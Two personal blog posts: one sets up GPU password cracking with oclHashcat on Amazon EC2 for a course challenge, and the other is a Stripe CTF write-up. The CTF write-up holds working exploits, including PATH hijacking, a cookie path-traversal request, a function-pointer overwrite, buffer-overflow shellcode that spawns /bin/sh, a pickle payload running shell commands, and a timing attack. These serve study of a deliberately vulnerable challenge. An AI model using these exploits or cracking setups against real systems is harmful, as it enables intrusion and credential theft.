08 Mar 2013, 00:00

Password Cracking on Amazon EC2

Introduction

In one of my courses at McMaster University - Computer Networks and Security - the professor gave a challenge in class. The first person to crack a crypt() hash would get a 3% bonus on their final grade, and the first person to crack a md5crypt()-based hash would get a 7% bonus on their final grade. I cracked the crypt() password while the class was still going, by using John the Ripper and a decent wordlist that I had lying around on this server. The md5crypt() one would be much harder to do on a cheap VPS, though, and my MacBook Air is nowhere near powerful enough to be of use. So, after I got home, I decided that I was going to try and use Amazon EC2 to gain those extra percent. Specifically, Amazon provides a GPU Instance, which comes with two NVIDIA Tesla M2050 GPUs attached. After a bit of work, I managed to get oclHashcat-plus, one of the world’s fastest GPU-based crackers, working on it. It wasn’t trivial, though, so here’s how I did it.

Installing CUDA

First, you need to start the instance. Go to the EC2 management console, and start the instance, using AMI ami-f4039f9d. This is the official Ubuntu for Cluster Computing 11.10. Note that the quickstart page provides 12.04 or 12.10, both of which present problems (no official NVIDIA driver, newer version of GCC, etc.).

EDIT: I’ve noticed that some people have trouble launching this AMI. The short way is to click this link. The longer, but perhaps more useful way is as follows:

  1. Go to the Ubuntu Amazon EC2 AMI Locator
  2. Filter by “oneiric” under the “Name” column, and “hvm” under the “Instance Type” column.
  3. Pick the region you want to launch the instance in, and click the AMI ID, which should bring up the EC2 Console, letting you launch the given instance.
  4. Launch the AMI on the “Cluster GPU” instance (cg1.4xlarge).

Once the instance is started, SSH into it, and install the basics:

sudo apt-get update
sudo apt-get install gcc g++ build-essential linux-headers-`uname -r`

Now, we need to install GLUT:

sudo apt-get install freeglut3 freeglut3-dev

Next, the CUDA toolkit for this version of Linux. You should install everything (yes, including the samples):

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_64_ubuntu11.10-1.run
chmod a+x cuda_5.0.35_linux_64_ubuntu11.10-1.run
sudo sh ./cuda_5.0.35_linux_64_ubuntu11.10-1.run --verbose

If there are any problems, check them out on Google - chances are, someone else has run into this already. Note that you need version 4.6 of GCC - the install checks for the version, and 4.7 will cause it to fail (this is especially true if you’re using 12.04 or 12.10). Also, you have to build the kernel module with the same version of GCC as the kernel was compiled with.

Anyway, once the toolkit is compiled, we need to set up the environment so that we can run CUDA programs. Open /etc/environment in your favorite editor, and append /usr/local/bin/cuda to the PATH variable. Next, create /etc/ld.so.conf.d/cuda.conf in your editor, add the following 2 lines, and save it:

/usr/local/cuda/lib64
/usr/local/cuda/lib

Run sudo ldconfig to update things, and the environment should be all set up. You can verify this by running the deviceQuery sample that comes with CUDA (you did install it above, right?):

cd /usr/local/cuda/samples/1_Utilities/deviceQuery
sudo make
sudo ./deviceQuery

This should show you the two NVIDIA M2050 GPUs that are attached. If you don’t see them, or you have an error, you need to fix things before continuing.

Installing oclHashcat-plus

Ok, once you reached this point, you should have a working CUDA install. Now that you’ve got this, you can grab oclHashcat-plus:

sudo apt-get install p7zip-full
wget http://hashcat.net/files/oclHashcat-plus-0.13.7z
7za x oclHashcat-plus-0.13.7z
cd oclHashcat-plus-0.13

Note that, despite the fact the project is called “oclHashcat”, we’re actually going to be using the “cudaHashcat” command. You can verify everything extracted correctly by trying to crack a simple hash. Here’s the full example and output from my tests:

ubuntu@ip-10-16-20-96:~/hashcat/oclHashcat-plus-0.13$ echo -n AndrewD | md5sum > hashes.test
ubuntu@ip-10-16-20-96:~/hashcat/oclHashcat-plus-0.13$ sudo ./cudaHashcat-plus64.bin --force --hash-type=0 -1 ?l?u -a 3 hashes.test ?1?1?1?1?1?1?1
cudaHashcat-plus v0.13 by atom starting…

Hashes: 1 total, 1 unique salts, 1 unique digests
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Workload: 256 loops, 80 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: Tesla M2050, 2687MB, 1147Mhz, 14MCU
Device #2: Tesla M2050, 2687MB, 1147Mhz, 14MCU
Device #1: Kernel ./kernels/4318/m0000_a3.sm_20.ptx
Device #2: Kernel ./kernels/4318/m0000_a3.sm_20.ptx

[s]tatus [p]ause [r]esume [b]ypass [q]uit =>

e974e36b5b0f062d86020252edd8ad51:AndrewD

Session.Name...: cudaHashcat-plus
Status.........: Cracked
Input.Mode.....: Mask (?1?1?1?1?1?1?1)
Hash.Target....: e974e36b5b0f062d86020252edd8ad51
Hash.Type......: MD5
Time.Started...: Fri Mar 8 17:47:09 2013 (4 mins, 39 secs)
Speed.GPU.#1...: 1159.8M/s
Speed.GPU.#2...: 1161.0M/s
Speed.GPU.# ...: 2320.9M/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 645335613440/1028071702528 (62.77%)
Rejected.......: 0/645335613440 (0.00%)
HWMon.GPU.#1...: 0% Util, -1c Temp, -1% Fan
HWMon.GPU.#2...: 7% Util, -1c Temp, -1% Fan

Started: Fri Mar 8 17:47:09 2013
Stopped: Fri Mar 8 17:51:55 2013
ubuntu@ip-10-16-20-96:~/hashcat/oclHashcat-plus-0.13$

If you can do the same, then things are working perfectly.

Cracking Tips

In addition to brute-force, I’d recommend grabbing a wordlist to use. This is much faster than running through the entire keyspace, and can often make the difference between cracking and not cracking a hash. If you want to do this, grab rtorrent, which is a fast, console-based torrent client, and a wordlist. I’ve heard good things about this wordlist, for example. Either way, here’s what I did:

cd /mnt
sudo mkdir wordlist
sudo chown ubuntu:ubuntu wordlist
cd wordlist
rtorrent

Then, inside rtorrent, press Backspace, paste a magnet link, hit Enter, and wait for the torrent to download (and then Ctrl-Q to exit). If the torrent contains a RAR file, here’s a couple of quick steps on how to extract it:

  1. Open /etc/apt/sources.list in your favorite editor.
  2. Add “multiverse” to the end of any lines that start with “deb” and end with “universe”. There should be 2 of these.
  3. sudo apt-get update
  4. sudo apt-get install unrar
  5. unrar x YOUR_RAR_FILE.rar

Once you have a wordlist, you can use it with oclHashcat like so:

./cudaHashcat-plus64.bin --attack-mode=0 --hash-type=0 [hashes file] /mnt/wordlist/wordlist.txt

And finally, one small tip: start any cracking attempts in a screen or tmux session, so if your SSH connection drops, you can reconnect. This is speaking from experience!

Conclusion

That’s all there is to it! Performance on the Cluster GPU instance is pretty decent (you can see above, it can perform about 2320.9 million MD5 hashes per second), and, once set up, easy to use. Sadly, after running two giant wordlists against the md5crypt() hash that I was testing, I didn’t have any luck. And since the instances are a bit pricy for a student to keep running, I decided to shut it down and earn those 7% the hard way. Back to studying! Though, if anyone feels like helping me earn those bonus marks, the hash can be found below.

$apr1$LJgyupye$GZQc9jyvrdP50vW77sYvz1

An additional note: while convenient, this isn’t the world’s most efficient way to do hash cracking. If you have the money, CloudCracker is a service I’ve heard good things about - though it doesn’t support all the hash types that oclHashcat does. Also, physical hardware will outperform EC2 pretty much all the time, so if you really need the extra speed, it would be worth investing in a few dedicated servers. A good example of something like this can be found here.

20 Mar 2012, 20:28

Stripe CTF

So, a couple weeks back, I took part in the Stripe CTF. Now that they’ve released the VM images of the CTF, and their own example solutions (see here for the wrap-up, here for the code), I figured I’d write my own post-mortem. I managed to solve all 6 levels, even though I’m not entirely happy with the solution for the final level (level06). Below, you can find how I solved each level. Some of my solutions were slightly edited for clarity (e.g. to remove stuff like debugging code).

Level01

The CTF starts off with the password e9gx26YEb2, and the instructions to SSH to level01@ctf.stri.pe. That’s simple enough, so I went ahead and did that. For each level, you can read the code for that level to determine how best to proceed to the next level. level01 started off with a simple program that executed system("date"). The binary is setuid as level02, so if we can somehow get it to execute our own code, we can read the next level’s password file (which was at /home/levelXX/.password for every level).

system() finds the command through the PATH environment variable, which means that if you change that, it’ll execute a custom “date” binary instead. So, it’s simple enough to write a pretty basic program or shell script that opens and prints the contents of /home/level02/.password, which will then be printed by the level02 binary itself. Problem solved! You could do other stuff like launch a shell, or copy the password file somewhere else, but it’s not necessary.

In short:

level01@ctf6:/tmp/tmp.TuSk2nyts9$ echo "cat /home/level02/.password" > date
level01@ctf6:/tmp/tmp.TuSk2nyts9$ chmod +x date
level01@ctf6:/tmp/tmp.TuSk2nyts9$ PATH=`pwd` /levels/level01
Current time: kxlVXUvzv

The password to level02 is: kxlVXUvzv

Level02

In this level, you’re given a PHP script running as level03 that will greet you. It does this by setting a cookie with a file path in it, and then saving the username and age you give it in this file. On further visits to the page, it’ll read path from the cookie, read the associated file, and then print ‘You’re NAME, and your age is AGE’.

Of course, the problem with all of this is, the file path is being stored on the client side. This means that if we can somehow get the PHP script to read the password file, it will print it out for us! Remember, the password file for the next level is at /home/level03/.password, and the relevant line in the PHP script is:

$out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);

So, all you need to do is create a path that will resolve to the password file, and pass it as a cookie. I did it in curl as a one-liner. Note that the site uses HTTP Digest Authentication, so you need to give the username and password for this level. The switch --digest will tell curl to use digest authentication, so the command is:

curl -s --cookie "user_details=../../home/level03/.password" --user level02:kxlVXUvzv --digest http://ctf.stri.pe/level02.php | grep "<p>"

The password to level03 is: Or0m4UX07b

Level03

This level is where things start to get tricky. The source code for level03 shows that we have a program that converts the first parameter to a number, and then uses that number to call a function from an array of function pointers, passing the second parameter as an argument. There’s also a bug in the capitalize() - printf("\n", str); has an extra parameter. I didn’t need it, though. The important bits of code are as follows:

typedef int (*fn_ptr)(const char *);

// [...]

int main(int argc, char **argv)
{
    int index;
    fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};

    // [...]

    index = atoi(argv[1]);
    if (index >= NUM_FNS) {
        // [...]
        exit(-1);
    }
    return truncate_and_call(fns, index, argv[2]);
}

// [...]

int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
    char buf[64];
    // Truncate supplied string
    strncpy(buf, user_string, sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = '\0';
    return fns[index](buf);
}

int run(const char *str)
{
    // This function is now deprecated.
    return system(str);
}

The four functions you can call are: to_upper, to_lower, capitalize, length, and do exactly what they say. However, there’s also a run() function (at address 0x0804875B) that was left in the binary, but isn’t in the array, as seen above. That function will call system() on the provided argument. If we could somehow get that function to run, we’d be able to execute code of our liking! Thankfully, the program doesn’t check for negative numbers, so we’re in luck.

If we run the program under gdb (which, by the way, clears the setuid bit), we can observe that the buffer buf, which contains our command-line string, is placed on the stack at address 0xffb3712c (this will be different for each run, due to ASLR), and our function pointers are at address 0xffb3719c. The gdb transcript is:

(gdb) break main
Breakpoint 1 at 0x80487d8: file level03.c, line 68.
(gdb) run 0 asdf
(gdb) x fns
0xffb3719c:     0xffb371b8
(gdb) break truncate_and_call
Breakpoint 2 at 0x8048780: file level03.c, line 57.
(gdb) c
(gdb) x buf
0xffb3712c:     0x00000000

If you look at the layout of the stack in-memory, it would look something like this:

0xffb3712c      buf[64]

[...]

0xffb3719c      fns: &to_upper
                fns: &to_lower
                fns: &capitalize
                fns: &length

If you subtract the two addresses you get 0xffb3719c - 0xffb3712c = 0x70, which, when we divide by the size of a pointer, is 0x28. So, running something like /levels/level03 -28 blah would call fns[-28], which is &fns - 28 * size of a pointer, which works out to be &fns - 0x70. From above, we see that this would call a function pointer that’s stored in the buf[] array. Now, we can put things in this array, by passing them on the command line, and therefore we can call an arbitrary function pointer we control. Things are a bit more complex - we need to get the program to run a script we control, and we’re in some temporary directory. So, we need to calculate the length of the directory (20 characters, for me), and then place a function pointer there. So, here’s what I ran to gain control:

export VAL=`pwd``printf "\x5B\x87\x04\x08"`
echo "#/bin/bash" >> test2
echo "/bin/cat /home/level04/.password" >> test2
/levels/level03 -23 $VAL

Note that “\x5B\x87\x04\x08” is the little-endian hexadecimal representation of our function pointer 0x0804875B, which is the address of the run() function in memory.

To summarize: the program runs, and then eventually executes the line return fns[index](buf);. In our case, index is -23, which reads a function pointer from offset 20 in the buffer buf[]. We’ve placed our little-endian function pointer there, so the program will execute something like: return 0x0804875B. And, we’ve created the file /tmp/whatever123456/\x5B\x87\x04\x08, which contains a shell script that reads the next level’s password file.

The final result - our password for level04 is: i5cBbPvPCpcP

Note: Depending on the length of the temporary directory path, we may have to change things or add padding to our filename. This would be as simple as adding 1-3 bytes of “a”s before the function pointer and modifying our index by 1. Remember - the function pointer must start on a multiple of 4 characters!

Level04

This level is the second-hardest level in this entire CTF, in my opinion. You’re given a very simple program, with the following code somewhere in it:

void fun(char *str)
{
  char buf[1024];
  strcpy(buf, str);
}

The parameter str is argv[1] (called like: fun(argv[1]);), so we can put arbitrary data into it. Now, the first thing to think of is: what happens if the value of str is LONGER than 1024 characters? Well, strcpy will happily keep copying until it eventually reaches a null byte (0x00), so it’ll overwrite whatever happens to be after that in memory. Thankfully for us, on x86 the return address is at a higher address than the buffer pointer on the stack - something like this:

buf[0]
buf[1]
...
buf[1023]
<other stuff>
return address

If we can overwrite that return address, we can cause the program to return (i.e. transfer execution) to an address we control. Of course, it’s not quite that easy. In this binary, we don’t have any handy run() function that will run another program for us. So, we need to be able to run some code we control, too. However, we have a problem. As I mentioned earlier, ASLR is enabled. This is a technology that’s designed to make it harder to do exactly this - exploit programs. Specifically what it does is randomize the addresses in-memory of various parts of a program - including the stack. So, we can’t simply use a hard-coded pointer to our buffer. No, we need to get tricky!

According to the documentation, “The strcpy() function shall return s1; no return value is reserved to indicate an error”. In short, it means it will return the address of our buffer. On x86, the return value of a function compiled with a standard calling convention (i.e. stdcall, cdecl, etc.) will be placed in the EAX register. So, we have an opportunity here. We overwrite the buf array, and also the return address. Once the function returns, it will transfer execution to a location we can specify. At offset 0x0804857b in the executable provided, there is a “CALL EAX” instruction. So, we can make the program return to an address that will then transfer execution to our buffer.

Once we’ve got execution transferred to our buffer, we need to do something with that. I settled on a quick exploit that would clear registers, push “/bin/sh” to stack, and then execute it - giving me shell access:

xor     ecx,ecx     ; 31c9
mul     eax,ecx     ; f7e1
push    ecx         ; 51
push    68732F2Fh   ; 682f2f7368
push    6E69622Fh   ; 682f62696e
mov     ebx,esp     ; 89e3
mov     al,0Bh      ; b00b
int     80h         ; cd80

I’ve provided the hex code of the exploit in the comments, for reference. Note the lack of null (0x00) bytes - since strcpy() will copy up to the first null byte, if there’s one in the exploiit, it will cause the exploit to fail. Thus, we simply clear eax and ecx, push ecx (which is now 0x00000000) to the stack for our null terminator, push “/bin/sh” encoded as hex, and then call the system call sys_execve (index 0x0B) to run it.

A couple technical notes: if we simply run that as given, it’ll segfault. Specifically what happens is that esp is still pointing to our shellcode, which means we’re actually overwriting our own code. I simply “cheated” and put a bunch of “DEC ESP” commands at the beginning of the shellcode (hex 0x4C).

My final exploit string is (note that it’s all on one line):

export SC=`perl -e 'print "\x90" x 915 . "\x31\xc9\xf7\xe1" . "\x4c" x 100 . "\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" . "\x7b\x85\x04\x08" . "CCCC" x 10'` /levels/level04 $SC

From within the resulting shell, we can simply cat the password file, and we get: fzfDGnSmd317

Level05

This one is actually pretty easy. There’s a Python script running that provides the ability to convert an input string to uppercase. We notice that the program serializes jobs with python’s pickle module, and then sends them to a series of workers, who then deserialize and process the job. Some excerpts from the program are:

@staticmethod
def deserialize(serialized):
    logger.debug('Deserializing: %r' % serialized)
    parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
    match = parser.match(serialized)
    direction = match.group(1)
    data = match.group(2)
    job = pickle.loads(match.group(3))
    return direction, data, job

@staticmethod
def serialize(direction, data, job):
    serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
    logger.debug('Serialized to: %r' % serialized)
    return serialized

And you can submit jobs like this:

curl localhost:9020 -d "uppercase me"

From this, we notice that the format of the serialized jobs is as follows:

type: blah; data: some data here; job: blah blah blah

So, we can force the program to deserialize our own custom data by manually crafting a request to the program that looks like this:

curl localhost:9020 -d "asdf; job: pickled data here"

This will cause the program to unpickle the data “pickled data here”. So, we can control the unpickling process - what now? Well, the pickle module is known to be insecure. As it says in the pickle documentation: “The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.“.

Also from this documentation, we see that there’s a magic method defined (__reduce__) that will be called when unpickling the class. We can therefore write a custom class that will execute our own custom python code when it’s unpickled:

q = '__import__("os").system("/bin/cat /home/level06/.password > /tmp/tmp.hSIOEi8xJ1/paswd")'
class Job(object):
    def __reduce__(self):
        return (eval, (q,))

I simply had the program read the password file, and then write it to the temporary directory I was currently in. The method given should work for any arbitrary system() call, so other methods are possible. Note that simply copying the file using cp doesn’t work, as cp will copy the permissions of the file, too.

After we have this, we have to generate our pickled data:

x = pickle.dumps(Job())

And then urlencode it, since our web server will helpfully urldecode() it for us.

print urllib.quote(x)

Finally, we need to generate some data that will bypass the regex. Our final one-line command is:

    curl localhost:9020  -d "asdf; job: c__builtin__%0Aeval%0Ap0%0A%28S%27__import__%28%22os%22%29.system%28%22/bin/cat%20/home/level06/.password%20%3E%20/tmp/tmp.hSIOEi8xJ1/paswd%22%29%27%0Ap1%0Atp2%0ARp3%0A."

From all this, we get: SF2w8qU1QDj

Level06

The final level! And, as is benefiting a final level, it’s HARD. I’ll link you to the source code of the program - go read it, and then come back here.

Done? OK. Here’s a short description of the vulnerability. The utility will print out a “.” to stderr on each comparison iteration. Upon the first mismatch, it will then fork(), and the child process will execl() /bin/echo to taunt the user. There are two potential attack vectors here:

The first idea is a timing attack. A fork() will cause the iteration with the first non-matching character to take longer than all other iterations. If we could somehow measure the length of each iteration, we could bruteforce each character one-at-a-time, reducing the complexity from keyspace^length passwords to keyspace * length passwords - a significant reduction.

The second is an output order attack. If we can somehow serialize the writes to stdout and stderr, we would see something like the following:

Welcome to the password checker!
.. Ha ha, your password is incorrect!
......

instead of

Welcome to the password checker!
........
Ha ha, your password is incorrect!

And this would then inform us that our second character is incorrect.

I tried a couple of approaches to this problem. My first thought was to use a FIFO (see mkfifo), hook both stdout and stderr to it, and then read one byte at a time, so that the writes would be serialized. This didn’t work, so I eventually decided to use a timing attack. My final code essentially did this:

clock_gettime(CLOCK_MONOTONIC, &t);
// [...]
ch = getchar();
clock_gettime(CLOCK_MONOTONIC, &t2);

And then, after getting the times, I would subtract them. This measures the difference between two successive dots being printed. On the iteration that is incorrect, the level06 binary would fork(), which would cause that iteration to take much longer than the others. Running this program like this:

#/bin/sh
/levels/level06 /home/the-flag/.password $1 2>&1 | ./timer

Would give a result like this:

level06@ctf4:/tmp/tmp.AuZnjcVqKo$ ./run.sh theflagaa
0.000001028
0.000001028
0.000001028
0.000001028
0.000001058
0.000001028
0.000001028
0.000001028
0.000101752

The first characters (“theflag”) are correct, but the next character (“a”) is not. This causes the last line to show an elapsed time approximately 100 times that of the other lines, thus showing that it is incorrect. Some Python scripting later, and I was able to brute-force the solution to the last level. It took several hours, due to other people using the machine, which would throw off the timing results.

A couple of quick notes: you have to link the program with -lrt, for the real-time library, and you should probably test a couple of times, to reduce the effect of other programs running on the same machine.

Finally, though, I was able to obtain the last password: theflagl0eFTtT5oi0nOTxO5

If I have some free time in the next couple weeks, I might go back to this question and come up with a “real” - i.e. elegant - solution to this problem. If I do, I’ll make another blog post!

Conclusion and Summary

In conclusion, this CTF was a lot of fun! It tested my knowledge of many different aspects of computer security, and generally made for an entertaining two days. Here’s a list of all the passwords, in order:

level01: e9gx26YEb2
level02: kxlVXUvzv
level03: Or0m4UX07b
level04: i5cBbPvPCpcP
level05: fzfDGnSmd317
level06: SF2w8qU1QDj
theflag: theflagl0eFTtT5oi0nOTxO5

Also, here’s some other writeups that people have published. Seeing how other people did things is always really cool!